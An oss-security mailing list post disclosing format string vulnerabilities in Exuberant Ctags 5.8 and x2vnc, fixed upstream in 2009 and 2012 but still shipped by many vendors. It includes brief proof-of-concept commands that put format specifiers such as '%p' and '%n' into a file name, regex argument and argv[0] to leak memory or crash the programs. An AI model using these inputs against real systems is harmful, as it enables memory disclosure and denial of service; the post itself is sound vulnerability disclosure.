[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Exuberant Ctags and x2vpn format string vulnerabilities
From:       Jasper Lievisse Adriaanse <j () jasper ! la>
Date:       2020-04-23 13:28:48
Message-ID: CDC3220B-901E-4A8C-B297-C39451934DE0 () jasper ! la
[Download RAW message or body]

Hello,

I noticed two format string vulnerabilities in Exuberant Ctags and x2vpn, both of these were \
fixed back in 2009 and 2012 however they don't appear to have been picked up widely. (Note this \
concerns Excuberant Ctags and not Universalt Ctags which is a continuation for the former.)

For example the issue in ctags was fixed in 2009 by the original author in the upstream \
subversion repository, but a proper release was never made after the affected 5.8 version was \
released. Some distributions (most notably Debian, Centos 8) have switched to distributing a \
version based on an svn checkout, whereas others (OpenBSD, FreeBSD, pkgsrc, CentOS < 8, \
Homebrew, etc) were still using the actual 5.8 release.

For ctags it can be triggered by specifying an existent but unreadable regex file with the \
following proof-of-concept:

$ touch "%p %p"; chmod 000 "%p %p"; ectags --regex-c="@%p %p"
ectags: Warning: 0x0 0x189fa32db1da : Permission denied
ectags: No files specified. Try "ectags --help".
$

Or a simple crasher:

$ touch %n; chmod 000 %n; ectags --regex-c=@%n
ectags: Warning: zsh: segmentation fault (core dumped)  ectags --regex-c=@%n
$

and for x2vpn it relies on overwriting argv[0]:

tau:2011 ctags % ARGV0="%08x %08x" x2vnc localhost:0
00000010 1e950c0a: ConnectToTcpAddr: connect: Connection refused
%08x %08x: unable to connect to VNC server
tau:2012 ctags %

I described some more details in https://blog.jasper.la/poking-old-format-string-bugs.html

I'm posting to this list to make sure other vendors are aware of these issues in ctags and \
x2vnc because eventhough there were fixed in 2009/2012, many vendors are still shipping the \
vulnerable code. If CVEs were to be allocated from the 2009 and 2012 ranges for ctags and x2vnc \
respectively to make tracking these issues easier, that wouldn't hurt I guess.

Cheers,
Jasper=


[prev in list] [next in list] [prev in thread] [next in thread]